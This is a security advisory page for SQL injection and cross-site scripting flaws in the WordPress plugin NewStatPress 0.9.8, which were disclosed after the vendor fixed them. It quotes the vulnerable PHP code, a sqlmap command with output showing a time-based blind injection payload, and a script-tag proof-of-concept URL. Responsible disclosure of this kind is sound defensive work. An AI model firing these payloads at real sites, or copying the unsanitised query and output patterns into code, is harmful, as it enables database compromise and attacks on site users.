Lucene search
Adrian M. F.PACKETSTORM:132038HistoryMay 25, 2015 - 12:00 a.m.
WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection
2015-05-2500:00:00
Adrian M. F.
packetstormsecurity.com
23
0.04 Low
EPSS
Percentile
92.1%
`# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: AdriΓ‘n M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
Vulnerabilities (2)
=====================
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
$where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
}
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
`
Related
zdt
zdt
exploitpack
exploitpack
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
2015-05-26 00:00:00
wpvulndb
wpvulndb
NewStatPress 0.9.8 - XSS & SQL Injection
2015-05-25 00:00:00
seebug
seebug
WordPress NewStatPress Plugin 0.9.8 xss+sql注ε
₯
2015-08-31 00:00:00
exploitdb
exploitdb
WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities
2015-05-26 00:00:00
nvd
nvd
CVE-2015-4062
2015-05-27 18:59:03
CVE-2015-4063
2015-05-27 18:59:04
cvelist
cvelist
CVE-2015-4062
2015-05-27 18:00:00
CVE-2015-4063
2015-05-27 18:00:00
patchstack
patchstack
WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities
2015-05-26 00:00:00
prion
prion
Cross site scripting
2015-05-27 18:59:00
Sql injection
2015-05-27 18:59:00
cve
cve
CVE-2015-4063
2015-05-27 18:59:04
CVE-2015-4062
2015-05-27 18:59:03
nuclei
nuclei
WordPress NewStatPress 0.9.8 - SQL Injection
2023-03-05 13:42:10
NewStatPress <0.9.9 - Cross-Site Scripting
2023-03-05 13:42:10